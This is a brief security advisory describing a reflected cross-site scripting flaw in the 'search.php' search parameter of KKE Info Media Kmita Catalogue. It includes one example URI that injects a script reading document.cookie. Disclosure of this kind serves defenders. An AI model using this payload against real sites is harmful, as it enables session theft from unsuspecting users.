KKE Info Media Kmita Catalogue 'search.php' Cross Site Scripting Vulnerability

KKE Info Media Kmita Catalogue 'search.php' Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/search.php?q=<script>alert(document.cookie);</script>&Search=Search